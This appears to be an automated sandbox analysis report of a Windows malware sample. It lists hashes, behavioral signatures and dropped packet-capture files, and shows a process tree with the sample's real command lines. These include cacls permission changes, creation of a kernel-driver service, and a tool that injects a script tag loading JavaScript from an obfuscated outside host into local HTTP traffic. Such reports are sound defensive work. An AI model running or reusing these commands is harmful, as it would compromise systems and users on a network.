Analysis

  • max time kernel
    91s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-09-2022 15:42

General

  • Target

    817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe

  • Size

    180KB

  • MD5

    4aff01ea7c1d02b1875305bc9c9def02

  • SHA1

    37290aa6679dd108b5b2ff0b65d2d3dccabc3c4d

  • SHA256

    817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1

  • SHA512

    7266d51a29a5feb87163faee23ca88ba95f3c7028740ac2ce80e59d23a5dc6302c5793005d7dba25a61a459a1bd4031836b7ceb96cd11b35fcf3db43f4ad381f

  • SSDEEP

    3072:vKpbbD+2uubU75qMs4s9k3PRl3RpM6Aa2A+9tUf9z5GmO+JTt93+FX6QB/6ForPh:vK9bjvbY5qj4s9oHhIA+Luz5Gmp3+FXr

Score
8/10

Malware Config

Signatures

  • Creates new service(s) 1 TTPs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 12 IoCs
  • Drops file in System32 directory 5 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: LoadsDriver 10 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe
    "C:\Users\Admin\AppData\Local\Temp\817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe"
    1⤵
    • Drops file in Drivers directory
    • Checks computer location settings
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2064
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c cacls %systemroot%\system32\WanPacket.dll /e /p everyone:f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1952
      • C:\Windows\SysWOW64\cacls.exe
        cacls C:\Windows\system32\WanPacket.dll /e /p everyone:f
        3⤵
          PID:3652
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c cacls %systemroot%\system32\Packet.dll /e /p everyone:f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3572
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\Packet.dll /e /p everyone:f
          3⤵
            PID:236
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c cacls %systemroot%\system32\wpcap.dll /e /p everyone:f
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4372
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\wpcap.dll /e /p everyone:f
            3⤵
              PID:4388
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c cacls %systemroot%\system32\npptools.dll /e /p everyone:f
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4712
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\npptools.dll /e /p everyone:f
              3⤵
                PID:1512
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c cacls %systemroot%\system32\drivers\npf.sys /e /p everyone:f
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4364
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\npf.sys /e /p everyone:f
                3⤵
                  PID:1412
              • C:\Windows\SysWOW64\sc.exe
                "C:\Windows\system32\sc.exe" create npf binpath= C:\Windows\system32\drivers\npf.sys type= kernel start= demand
                2⤵
                • Launches sc.exe
                PID:4428
              • C:\Windows\SysWOW64\360trar.exe
                "C:\Windows\system32\360trar.exe" -idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=javascript src=http://i%338.x%6Frg.%70l/a.js></script>"
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:3480
              • C:\Windows\SysWOW64\360trar.exe
                "C:\Windows\system32\360trar.exe" -idx 1 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=javascript src=http://i%338.x%6Frg.%70l/a.js></script>"
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:3712

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Windows\SysWOW64\360trar.exe

              Filesize

              13KB

              MD5

              ca42539e85a7f9bb372da8124f7a3254

              SHA1

              94ada2eaf210d3669b9d6873a5463eda6207a12a

              SHA256

              1a40928fca630e735dac69a800d707b67ed2d05740a0b869f438d1ad8245607f

              SHA512

              4e5a897c9d45611ed9b49185819772a6e08342a2449c9d213be90a37a02cd4004e7728cf131db50e82c696210e51752491ce11ca92528c5a1f5a5b2fde3d0017

            • C:\Windows\SysWOW64\360trar.exe

              Filesize

              13KB

              MD5

              ca42539e85a7f9bb372da8124f7a3254

              SHA1

              94ada2eaf210d3669b9d6873a5463eda6207a12a

              SHA256

              1a40928fca630e735dac69a800d707b67ed2d05740a0b869f438d1ad8245607f

              SHA512

              4e5a897c9d45611ed9b49185819772a6e08342a2449c9d213be90a37a02cd4004e7728cf131db50e82c696210e51752491ce11ca92528c5a1f5a5b2fde3d0017

            • C:\Windows\SysWOW64\360trar.exe

              Filesize

              13KB

              MD5

              ca42539e85a7f9bb372da8124f7a3254

              SHA1

              94ada2eaf210d3669b9d6873a5463eda6207a12a

              SHA256

              1a40928fca630e735dac69a800d707b67ed2d05740a0b869f438d1ad8245607f

              SHA512

              4e5a897c9d45611ed9b49185819772a6e08342a2449c9d213be90a37a02cd4004e7728cf131db50e82c696210e51752491ce11ca92528c5a1f5a5b2fde3d0017

            • C:\Windows\SysWOW64\NPPTools.dll

              Filesize

              48KB

              MD5

              38e7f4e56118d91df929dba40035c017

              SHA1

              a6fe6350e19622fd60561547a6a6882bdc52bfb7

              SHA256

              281908702a725158d3bab00e7adb50069b1035f1bc5562b196c6bd6c49518361

              SHA512

              c4fa93e6760ce1083afbc0a97cd2a3cbece441acd426da547576d5f8c398554e90f3f89a78cedf5d87233e2de8487b8a6779fcf6346920ba873f4923af9324a4

            • C:\Windows\SysWOW64\Packet.dll

              Filesize

              86KB

              MD5

              9062aeea8cbfc4f0780bbbefad7cebcb

              SHA1

              c4ad39ec51ad0e84fe58f62931d13cddfde3189e

              SHA256

              b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c

              SHA512

              60957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646

            • C:\Windows\SysWOW64\Packet.dll

              Filesize

              86KB

              MD5

              9062aeea8cbfc4f0780bbbefad7cebcb

              SHA1

              c4ad39ec51ad0e84fe58f62931d13cddfde3189e

              SHA256

              b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c

              SHA512

              60957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646

            • C:\Windows\SysWOW64\Packet.dll

              Filesize

              86KB

              MD5

              9062aeea8cbfc4f0780bbbefad7cebcb

              SHA1

              c4ad39ec51ad0e84fe58f62931d13cddfde3189e

              SHA256

              b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c

              SHA512

              60957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646

            • C:\Windows\SysWOW64\Packet.dll

              Filesize

              86KB

              MD5

              9062aeea8cbfc4f0780bbbefad7cebcb

              SHA1

              c4ad39ec51ad0e84fe58f62931d13cddfde3189e

              SHA256

              b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c

              SHA512

              60957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646

            • C:\Windows\SysWOW64\WPCAP.DLL

              Filesize

              234KB

              MD5

              ce842d25e5b7e6ff21a86cad9195fbe8

              SHA1

              d762270be089a89266b012351b52c595e260b59b

              SHA256

              7e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3

              SHA512

              84c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6

            • C:\Windows\SysWOW64\WanPacket.dll

              Filesize

              66KB

              MD5

              fdd104a9fd3427a1df37041fa947a041

              SHA1

              cca1881a3c02033008f78cc39b712b637c7f3e13

              SHA256

              384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a

              SHA512

              9dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7

            • C:\Windows\SysWOW64\WanPacket.dll

              Filesize

              66KB

              MD5

              fdd104a9fd3427a1df37041fa947a041

              SHA1

              cca1881a3c02033008f78cc39b712b637c7f3e13

              SHA256

              384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a

              SHA512

              9dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7

            • C:\Windows\SysWOW64\WanPacket.dll

              Filesize

              66KB

              MD5

              fdd104a9fd3427a1df37041fa947a041

              SHA1

              cca1881a3c02033008f78cc39b712b637c7f3e13

              SHA256

              384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a

              SHA512

              9dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7

            • C:\Windows\SysWOW64\WanPacket.dll

              Filesize

              66KB

              MD5

              fdd104a9fd3427a1df37041fa947a041

              SHA1

              cca1881a3c02033008f78cc39b712b637c7f3e13

              SHA256

              384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a

              SHA512

              9dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7

            • C:\Windows\SysWOW64\WanPacket.dll

              Filesize

              66KB

              MD5

              fdd104a9fd3427a1df37041fa947a041

              SHA1

              cca1881a3c02033008f78cc39b712b637c7f3e13

              SHA256

              384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a

              SHA512

              9dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7

            • C:\Windows\SysWOW64\drivers\NPF.sys

              Filesize

              41KB

              MD5

              b15e0180c43d8b5219196d76878cc2dd

              SHA1

              33e676b37a3380de32c10ba5bc9170997445d314

              SHA256

              a4a102aab8f91a5b452ae2c9a40f5ebc07bc62af892af57d6e3ad1f4340486ab

              SHA512

              47e0e66e89ad11506aff709e7cd5817f5b68bafd5fbc4cc4f4ba5b82b1845977023c90273c58d580266fc8fdcb7fd230ade9c31a8dcc8b9b6ca146423e848a09

            • C:\Windows\SysWOW64\npptools.dll

              Filesize

              48KB

              MD5

              38e7f4e56118d91df929dba40035c017

              SHA1

              a6fe6350e19622fd60561547a6a6882bdc52bfb7

              SHA256

              281908702a725158d3bab00e7adb50069b1035f1bc5562b196c6bd6c49518361

              SHA512

              c4fa93e6760ce1083afbc0a97cd2a3cbece441acd426da547576d5f8c398554e90f3f89a78cedf5d87233e2de8487b8a6779fcf6346920ba873f4923af9324a4

            • C:\Windows\SysWOW64\npptools.dll

              Filesize

              48KB

              MD5

              38e7f4e56118d91df929dba40035c017

              SHA1

              a6fe6350e19622fd60561547a6a6882bdc52bfb7

              SHA256

              281908702a725158d3bab00e7adb50069b1035f1bc5562b196c6bd6c49518361

              SHA512

              c4fa93e6760ce1083afbc0a97cd2a3cbece441acd426da547576d5f8c398554e90f3f89a78cedf5d87233e2de8487b8a6779fcf6346920ba873f4923af9324a4

            • C:\Windows\SysWOW64\packet.dll

              Filesize

              86KB

              MD5

              9062aeea8cbfc4f0780bbbefad7cebcb

              SHA1

              c4ad39ec51ad0e84fe58f62931d13cddfde3189e

              SHA256

              b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c

              SHA512

              60957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646

            • C:\Windows\SysWOW64\wpcap.dll

              Filesize

              234KB

              MD5

              ce842d25e5b7e6ff21a86cad9195fbe8

              SHA1

              d762270be089a89266b012351b52c595e260b59b

              SHA256

              7e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3

              SHA512

              84c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6

            • C:\Windows\SysWOW64\wpcap.dll

              Filesize

              234KB

              MD5

              ce842d25e5b7e6ff21a86cad9195fbe8

              SHA1

              d762270be089a89266b012351b52c595e260b59b

              SHA256

              7e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3

              SHA512

              84c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6

            • memory/236-136-0x0000000000000000-mapping.dmp

            • memory/1412-142-0x0000000000000000-mapping.dmp

            • memory/1512-140-0x0000000000000000-mapping.dmp

            • memory/1952-133-0x0000000000000000-mapping.dmp

            • memory/2064-164-0x0000000000400000-0x00000000004B7000-memory.dmp

              Filesize

              732KB

            • memory/2064-143-0x0000000000400000-0x00000000004B7000-memory.dmp

              Filesize

              732KB

            • memory/2064-132-0x0000000000400000-0x00000000004B7000-memory.dmp

              Filesize

              732KB

            • memory/3480-145-0x0000000000000000-mapping.dmp

            • memory/3480-161-0x0000000000400000-0x000000000040F000-memory.dmp

              Filesize

              60KB

            • memory/3480-157-0x0000000000470000-0x0000000000480000-memory.dmp

              Filesize

              64KB

            • memory/3480-153-0x0000000000490000-0x00000000004A5000-memory.dmp

              Filesize

              84KB

            • memory/3572-135-0x0000000000000000-mapping.dmp

            • memory/3652-134-0x0000000000000000-mapping.dmp

            • memory/3712-168-0x00000000001D0000-0x00000000001E5000-memory.dmp

              Filesize

              84KB

            • memory/3712-171-0x0000000000870000-0x0000000000880000-memory.dmp

              Filesize

              64KB

            • memory/3712-162-0x0000000000000000-mapping.dmp

            • memory/3712-173-0x0000000000400000-0x000000000040F000-memory.dmp

              Filesize

              60KB

            • memory/4364-141-0x0000000000000000-mapping.dmp

            • memory/4372-137-0x0000000000000000-mapping.dmp

            • memory/4388-138-0x0000000000000000-mapping.dmp

            • memory/4428-144-0x0000000000000000-mapping.dmp

            • memory/4712-139-0x0000000000000000-mapping.dmp